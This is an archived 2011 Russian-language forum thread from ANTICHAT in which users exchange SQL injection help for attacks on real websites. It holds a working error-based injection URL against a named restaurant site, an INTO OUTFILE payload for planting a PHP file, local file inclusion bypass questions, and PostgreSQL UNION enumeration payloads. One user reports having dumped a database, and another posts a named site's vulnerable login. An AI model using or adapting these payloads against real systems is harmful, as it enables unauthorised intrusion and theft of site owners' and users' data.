ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.02.2011, 18:33
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://www.menupix.com/losangeles/restaurants.php?id=-204431+or+1+group+by+concat((select+table_name+fro m+information_schema.`tables`+limit+1),floor(rand( 0)*2))having+min(0)+or+1
|
|
|
20.02.2011, 19:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
28895
Репутация:
4
|
|
Ребят вытянул дб, сделал экспорт на локалхост, в таблицах есть строки, как сделать сортировку, чтобы повторных значений не было? например строка id_user ...
|
|
|
|
20.02.2011, 19:28
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
select distinct id_user from....
|
|
|
|
20.02.2011, 19:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
22665
Репутация:
-6
|
|
Сообщение от None
Можешь поподробнее описать, как проверить привелегии и как правильно составить запрос.
Дира где находиться сайт /home/.sites/site1/
Тебе ж уже вроде написали.
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --
А вообще читай /thread43966.html
|
|
|
|
20.02.2011, 20:22
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от Vollkorn
Vollkorn said:
Здравствуйте. Есть некий сайт, там присутствует local file inclusion, которая дописывает расширение .php. В чем вопрос, знаю можно попытаться отбросить нуль байтом, но когда я пытаюсь это сделать ничего не происходит, еще слышал о 4096 слешах, но даже при их добавлении пишет "Failed opening путь/passwd//////[много слешей]", без расширения. Подскажите пожалуйста что делать.
Этот метод работает не везде.
https://forum.antichat.net/thread98525.html
|
|
|
|
21.02.2011, 01:45
|
|
Участник форума
Регистрация: 12.04.2009
Сообщений: 129
Провел на форуме:
150009
Репутация:
14
|
|
ребят такой вопрос, вообщем на одном сайте нашёл скуль инж (_http://www.bittu.org.ru//comtech/?q=node/21), формируется в методом POST если в если в поле логин ввести ковычку, выводит warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/aptech/includes/common.inc(1547) : eval()'d code on line 42.
я не очень понимаю в инъекциях, точнее нихрена я не понимаю, помогите плз! каким образом мне вообще формировать запросы к БД, авторизациями?
P.S если есть какой нибудь добрый дядька кто проконсультирует в этом вопросе, милости прошу icq 3300890.
|
|
|
|
21.02.2011, 14:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
191387
Репутация:
6
|
|
подобрал число колонок на PostgreSQL (PostgreSQL 8.1.11 on i686-pc-linux-gnu)
1+union+select+null,null,null,null,null,null,null, null,null,null,null+--+
сделал
1+union+select+table_name,table_name,table_name,ta ble_name,table_name,table_name,table_name,table_na me,table_name,table_name,table_name+from+informati on_schema.tables+--+
пишет
Query failed: ERROR: UNION types integer and character varying cannot be matched in
Как обойти?
|
|
|
|
21.02.2011, 14:38
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
ты сначала вывод определи в какой колонке идет..потом уже запрос делай, и еще все зависит от версии постгре...в новых есть INFORMATION_SCHEMA.TABLES а в старых пользуйся PG_TABLES
|
|
|
|
21.02.2011, 14:55
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от noviyuser
noviyuser said:
пишет
Query failed: ERROR: UNION types integer and character varying cannot be matched in
Это несовпадение типов данных, вывод напрашивается сам по себе.
|
|
|
|
21.02.2011, 15:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
191387
Репутация:
6
|
|
Сообщение от Gorev
Gorev said:
ты сначала вывод определи в какой колонке идет..потом уже запрос делай, и еще все зависит от версии постгре...в новых есть INFORMATION_SCHEMA.TABLES а в старых пользуйся PG_TABLES
в том то и проблема что не могу определить какое поле выводится, если null,null,null то все нормально а если числовое значение делаю т.е. 1,2,3 и т.д. ошибку выводит
cast(table_name+as+int) тоже не канает
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
